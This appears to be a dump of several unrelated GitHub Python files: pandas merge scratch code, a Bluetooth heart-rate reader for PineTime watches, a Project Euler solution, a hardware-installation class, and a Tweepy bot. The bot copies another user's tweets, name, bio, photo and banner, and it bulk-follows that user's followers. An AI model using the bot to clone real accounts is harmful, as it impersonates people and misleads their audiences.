merged_df1 = pd.concat([merged_df1, df2.loc[merged_df1['right_index']]])
# Reset index in merged_df1
merged_df1.reset_index(drop=True, inplace=True)
# Perform merge based on specified columns
merged_df = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left')
# Drop duplicate rows from df2 based on specified columns, keep the first occurrence
merged_df = merged_df.drop_duplicates(subset=merge_columns, keep='first')
# Identify matching rows
matching_rows = merged_df.dropna(subset=merge_columns)
# Extract the matching indices from df2
matching_indices = matching_rows.index.tolist()
# Add a new column to df1 with matching indices from df2
df1['matching_index'] = matching_indices
merged_df3 = pd.merge(df1, df3, left_index=True, right_index=True, left_on=left_on, right_on=merge_columns, how='left')
merged_df3.set_index(merged_df3['column2'], inplace=True)
# Merge df1 with df3 to find the matching index numbers in df2
merged_df3 = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left', suffixes=('', '_spec'))
# Get the matching index numbers from df3
index_numbers = merged_df3.index_spec.values
# Extract the matching rows from df2 using the index numbers
matching_df2 = df2.iloc[index_numbers]
# Concatenate the specs from matching_df2 to df1 based on their index values
merged = pd.concat([df1, matching_df2], axis=1)
# The resulting merged dataframe should now contain the specs from matching_df2
# concatenated to df1 for the cars with matching index numbers in df3.
# Save the resulting merged dataframe to a new CSV file if needed
merged.to_csv('merged_cars.csv', index=False) # Replace with the desired filename
merged_keys = pd.merge(df1, df3, left_on=left_on, right_on=merge_columns, how='left')
index_numbers = merged_keys.index.tolist()
# Reset the index of df2
df2 = df2.reset_index(drop=True)
# Select rows from df2 using the extracted index numbers
selected_rows = df2.iloc[index_numbers]
# Concatenate df1 with selected rows from df2
merged = pd.concat([df1, selected_rows], axis=0, ignore_index=True)
merged.to_csv('merged.csv', index=False)
merged = pd.concat([df1, df2.iloc[index_numbers]], axis=0, ignore_index=True)
merged.to_csv('merged.csv', index=False)
# Drop the duplicate columns '_y' from the merge
merged = merged.filter(regex='^(?!.*_y)')
# Reset the index
merged.reset_index(drop=True, inplace=True)
merged.to_csv('merged.csv', index=False)
moo = [str(x).find('u') for x in data if str(x).find('u') > -1 and str(x).find('u') < 100]
engine = data[99]['סוג מנוע']
moo = data[1]
data_read = [json.loads(x) for x in data]
makes = rows2[0]
b=5''' | Chilledfish/icar-Project | icar_database.py | icar_database.py | py | 8,242 | python | en | code | 0 | github-code | 13 |
10524006333 |
MOTION_SERVICE_UUID = "00030000-78fc-48fe-8e23-433b3a1942d0"
STEP_COUNT_UUID = "00030001-78fc-48fe-8e23-433b3a1942d0"
RAW_XYZ_UUID = "00030002-78fc-48fe-8e23-433b3a1942d0"
HEART_RATE_UUID = "00002a37-0000-1000-8000-00805f9b34fb"
MODEL_NBR_UUID = "00002a24-0000-1000-8000-00805f9b34fb"
"""
import asyncio
from bleak import BleakScanner
async def main():
devices = await BleakScanner.discover()
for d in devices:
print(d)
asyncio.run(main())
"""
import asyncio
from bleak import BleakClient
import numpy as np
address = [["CB:F9:47:BD:83:F3"],["DB:0C:6E:BF:5E"],["F7:E6:68:B7:A4:71"]]
async def main(address):
for item in address:
print(item)
try:
async with BleakClient(item) as client:
#model_number = await client.read_gatt_char(MODEL_NBR_UUID)
#print(model_number)
heart_buffer = await client.read_gatt_char(HEART_RATE_UUID)
step_buffer = await client.read_gatt_char(STEP_COUNT_UUID)
raw_buffer = await client.read_gatt_char(RAW_XYZ_UUID)
raw_data = np.frombuffer(raw_buffer, dtype=np.int16)
step_data = np.frombuffer(step_buffer, dtype=np.int16)
heart_data = np.frombuffer(heart_buffer, dtype=np.int8)
print("motion")
print(raw_data)
print("heart rate")
#print(heart_rate)
print(heart_data[1])
print("step count")
print(step_data[0])
#return heart_data[1]
except BleakDeviceNotFoundError:
print(item + " device not found")
#print(step_data[0]+heart_data[1])
#print(item.decode())
#print("HT: {0}".format("".join(map(chr, model_number))))
heart_data = asyncio.run(main(address[0]))
#osc.send(/cue/heart_data)
#except:
# print("timeout") | Sussex-Neuroscience/many_pinetime_heartbeats | legacy/new.py | new.py | py | 2,107 | python | en | code | 0 | github-code | 13 |
37562353138 | # The prime factors of 13195 are 5, 7, 13 and 29.
# What is the largest prime factor of the number 600851475143 ?
def prime_check(x):
for i in range(2,int(x ** 0.5) + 1):
if x%i ==0:
return False
return True
biggest_prime = 1
for i in range(2,int(600851475143 ** 0.5)):
if (600851475143 % i == 0 and prime_check(i)):
biggest_prime = i
print(biggest_prime)
| mertsengil/Project_Euler_with_Python | Problem_3.py | Problem_3.py | py | 414 | python | en | code | 0 | github-code | 13 |
18414787771 | from project.software.software import Software
class Hardware:
def __init__(self, name, type, capacity, memory):
self.name = name
self.type = type # NOTE Test both types of hardware ("Heavy" or "Power")
self.capacity = capacity # NOTE Test both capacity types of hardware ("Heavy" or "Power")
self.memory = memory
self.software_components = []
self.memory_used = 0
self.capacity_used = 0
def install(self, software: Software):
if self.memory_used + software.memory_consumption > self.memory \
or self.capacity_used + software.capacity_consumption > self.capacity:
raise Exception("Software cannot be installed")
# NOTE create both type of software -->> (Express and Light) / Create both types of hardware as well
self.software_components.append(software) # Test successful and unsuccessful installation
self.memory_used += software.memory_consumption
self.capacity_used += software.capacity_consumption
def uninstall(self, software: Software):
self.software_components.remove(software)
self.memory_used -= software.memory_consumption
self.capacity_used -= software.capacity_consumption
| MiroVatov/Python-SoftUni | PYTHON OOP/Previous Exams/Exam Prep 16 August 2020 Version 2/project/hardware/hardware.py | hardware.py | py | 1,262 | python | en | code | 0 | github-code | 13 |
38605594320 | # -*- coding: utf-8 -*-
import tweepy
import requests
from access import *
import argparse
class Api(object):
def __init__(self):
super(Api, self).__init__()
try:
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
# Return API access:
self.api = tweepy.API(auth, wait_on_rate_limit=True,
wait_on_rate_limit_notify=True, compression=True)
redirect_url = auth.get_authorization_url()
except tweepy.TweepError:
raise Exception('Error! Failed to get request token, please complete \
access file')
def get_user(self, user):
return self.api.get_user(user)
def retrieve_tweets(self, user, count=20, include_rts=False):
try:
return self.api.user_timeline(screen_name=user, count=count,
include_rts=include_rts)
except Exception as e:
raise e
def post_tweet(self, tweet_text):
try:
self.api.update_status(tweet_text)
print("Successfully posted.")
except tweepy.TweepError as e:
print(e.reason)
def clone_last_tweets(self, user_clone, quantity):
tweets = self.retrieve_tweets(user_clone, quantity)[::-1]
self.post_tweet("@{} is going to be cloned".format(user_clone))
for tweet in tweets:
# Print tweet:
print(tweet.text)
self.post_tweet(tweet.text)
def delete_tweets(self):
print("Deleting all tweets from the account @".
format(self.api.verify_credentials().screen_name))
for status in tweepy.Cursor(self.api.user_timeline).items():
try:
self.api.destroy_status(status.id)
except Exception as e:
print(e)
def print_tweets(self, tweets):
for i in tweets:
print(i.text+"\n")
def follow_users(self, user, quantity):
print("Following {} users from {}".format(quantity, user))
for page in tweepy.Cursor(self.api.followers_ids, screen_name=user).pages():
size = min(len(page), quantity)
[self.api.create_friendship(id=page[i]) for i in range(size)]
if len(page) > quantity:
print("Followed {} users".format(quantity))
return
else:
print("Followed {} users".format(len(page)))
quantity -= len(page)
def save_profile_photo(self, user):
try:
image_url = user.profile_image_url[:63]+user.profile_image_url[70:]
img_data = requests.get(image_url).content
with open('profile_photo.jpg', 'wb') as handler:
handler.write(img_data)
except Exception as e:
raise e
def save_profile_banner(self, user):
try:
image_url = user.profile_banner_url
img_data = requests.get(image_url).content
with open('banner_photo.jpg', 'wb') as handler:
handler.write(img_data)
except Exception as e:
raise e
def update_profile(self, user):
print("Updating your profile....")
user = self.get_user(user)
user_data = {
"name": user.name,
"location": user.location,
"url": user.url,
"description": user.description,
"profile_link_color": user.profile_link_color,
}
self.save_profile_photo(user)
self.save_profile_banner(user)
self.api.update_profile_image("./profile_photo.jpg")
self.api.update_profile_banner("./banner_photo.jpg")
self.api.update_profile(**user_data)
print("Successfully update your profile, using @{} profile".
format(user.screen_name))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--print", help="print N tweets from the given profile",
type=int)
parser.add_argument("-c", "--clone", help="clone N tweets from the given profile",
type=int)
parser.add_argument("-d", "--delete", help="delete all tweets from the authenticated account",
action="store_true")
parser.add_argument("-f", "--follow", help="follow N users from the given profile [slow]",
type=int)
parser.add_argument("-up", help="update profile data using the profile cloning \
the given profile",
action="store_true")
parser.add_argument("--user", help="provide user to clone from the command line",
action="store", type=str)
parser.add_argument("--export", help="sav",
action="store", type=str)
args = parser.parse_args()
bot = Api()
if args.user:
user = args.user
else:
user = input("Give some public profile please\n")
if args.print:
bot.print_tweets(bot.retrieve_tweets(user, args.print))
if args.clone:
bot.clone_last_tweets(user, args.clone)
if args.follow:
bot.follow_users(user, args.follow)
if args.delete:
bot.delete_tweets()
if args.up:
bot.update_profile(user)
| agusmdev/clone-twitter-account | clone_profile.py | clone_profile.py | py | 5,461 | python | en | code | 7 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.